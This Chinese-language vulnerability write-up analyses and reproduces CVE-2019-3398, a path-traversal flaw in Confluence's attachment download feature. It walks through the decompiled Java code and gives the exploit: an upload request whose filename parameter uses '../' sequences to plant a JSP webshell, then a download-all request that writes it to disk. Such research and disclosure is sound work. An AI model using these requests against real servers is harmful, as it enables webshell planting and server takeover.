(CVE-2019-3398)Confluence 路径穿越漏洞¶
一、漏洞简介¶
二、漏洞影响¶
2.0.0 \<= version \< 6.6.136.7.0 \<= version \< 6.12.46.13.0 \<= version \< 6.13.46.14.0 \<= version \< 6.14.36.15.0 \<= version \< 6.15.2
三、复现过程¶
漏洞分析¶
首先根据官方描述,downloadallattachments这个资源,结合其验证缓解措施的方式,找到了漏洞触发点:
... =》附件=》下载全部
点击下载全部时,会触发一个GET请求:
GET /pages/downloadallattachments.action?pageId=65601
然后响应
Location: /download/temp/downloadi120q121507.zip?contentType=application/zip
而且每次发出downloadallattachments.action请求,其响应的Location路径的zip文件名都不一样,发现原来是服务端每收到一次downloadallattachments.action请求,就会在download/temp/目录下生成一个zip文件:
1.png
搜索了一下,发现这个文件是在/Users/xxx/confluenceHome,也就是confluence的安装目录下。
cqq@ubuntu:~$ find .|grep download45lL6115220.zip
./confluenceHome/temp/download45lL6115220.zip
然后看到这个目录下还有一个attachments目录,为了验证这就是附件上传的目录,
2.png
于是,新建了一个页面,上传了几个文本文件,通过cat出来的内容与上传的内容匹配,判定这个就是上传的附件被存放的目录,但是这个目录下的文件名被重命名了。既然官方说是路径穿越漏洞,就得找到文件名或者文件路径的输入点。在这里上传文件的过程中抓一下包,发现有两个参数是文件名/文件路径相关的,filename和name,经过测试发现漏洞点参数是filename。
漏洞复现¶
通过一番grep -rn xxx *的查找,发现需要两步来完成对路径穿越的利用。
1、POST /plugins/drag-and-drop/upload.action?pageId=65601&filename=../../../../../../Users/xxx/repos/atlassian-confluence-6.13.0/confluence/admin/cqq2.jsp&size=754&minorEdit=true&spaceKey=ADMIN&mimeType=application%2Foctet-stream&atl_token=47ae1afbc53f1ed100a4c36053de2d754d48ffeb&contentType=page&isVFMSupported=true&name=cqq2.jsp先将webshell上传上去,其内容会出现在confluence的安装目录,即/Users/xxx/confluenceHome。注意上传的时候的size参数需与Content-Length值保持一致,服务端会对这个做校验,若发现不一致,则会导致500。在UploadAction#execute下断点
confluence/WEB-INF/atlassian-bundled-plugins/confluence-drag-and-drop-6.13.0.jar!/com/atlassian/confluence/plugins/dragdrop/UploadAction.class
通过
InputStream inStream = this.getStreamForEncoding(this.httpServletRequest);
this.fileUploadManager.storeResource(new InputStreamAttachmentResource(inStream, this.filename, this.mimeType, this.size, (String)null, this.minorEdit), (ContentEntityObject)content);
将POST的内容写入到缓存文件中:attachments/ver003//56/98/98306/101/65/65601/917509/1,3.pngfilename值没有对../进行过滤。44.png上传完成之后,打开"全部附件"页面,会出现我们刚刚上传上去的文件,其文件名没有对../进行过滤。5.png
2、GET /pages/downloadallattachments.action?pageId=65601然后通过这个GET请求,触发将缓存的webshell内容写入指定的路径操作。在DownloadAllAttachmentsOnPageAction#execute下断点
confluence/WEB-INF/lib/confluence-6.13.0.jar!com/atlassian/confluence/pages/actions/DownloadAllAttachmentsOnPageAction.class
文件内容:
public String execute() throws Exception {
List<Attachment> latestAttachments = this.attachmentManager.getLatestVersionsOfAttachments(this.getPage());
Iterator var2 = latestAttachments.iterator();
while(var2.hasNext()) {
Attachment attachment = (Attachment)var2.next();
File tmpFile = new File(this.getTempDirectoryForZipping(), attachment.getFileName());
InputStream inputStream = this.attachmentManager.getAttachmentData(attachment);
Throwable var6 = null;
try {
OutputStream fileOutputStream = new FileOutputStream(tmpFile); // tmpFile内容为/Users/Xxx/repos/confluenceRepos/temp/download8gHGV130701/../../../../../../Users/Xxx/repos/atlassian-confluence-6.13.0/confluence/admin/cmd222.jsp
Throwable var8 = null;
try {
ByteStreams.copy(inputStream, fileOutputStream); //将缓存文件写入指定的路径
} catch (Throwable var31) {
var8 = var31;
throw var31;
} finally {
if (fileOutputStream != null) {
if (var8 != null) {
try {
fileOutputStream.close();
} catch (Throwable var30) {
var8.addSuppressed(var30);
}
} else {
fileOutputStream.close();
}
}
}
} catch (Throwable var33) {
var6 = var33;
throw var33;
} finally {
if (inputStream != null) {
if (var6 != null) {
try {
inputStream.close();
} catch (Throwable var29) {
var6.addSuppressed(var29);
}
} else {
inputStream.close();
}
}
}
}
//在confluence安装路径的temp目录下生成zip文件。
File zipFile = new File(this.getConfluenceTempDirectoryPath() + File.separator + this.getZipFilename() + ".zip");
FileUtils.createZipFile(this.getTempDirectoryForZipping(), zipFile);
FileUtils.deleteDir(this.getTempDirectoryForZipping());
this.downloadPath = this.prepareDownloadPath(zipFile.getPath()) + "?contentType=application/zip";
this.gateKeeper.addKey(this.prepareDownloadPath(zipFile.getPath()), this.getAuthenticatedUser());
return "success";
}
先拿到Attachement列表
List<Attachment> latestAttachments = this.attachmentManager.getLatestVersionsOfAttachments(this.getPage());
然后对列表中每个附件进行遍历,从最前面的开始,
然后通过666.png
attachment.getFileName())
获得附件的名字(这里有我们之前设置好的payload文件名)然后执行
ByteStreams.copy(inputStream, fileOutputStream);
将之前缓存的上传文件copy到通过请求参数filename指定的路径下,实现路径穿越。7.png执行前后对比如下:8.png对比缓存文件和在指定路径生成的文件的sha1值对比:一致。9.pngConfluence本身就可以上传任意文件内容到服务端,但是会放在缓存目录下,文件路径不可控。关键地是,没有对filename请求参数进行过滤,有路径穿越漏洞,才能将指定文件名指定文件内容写入到文件系统中。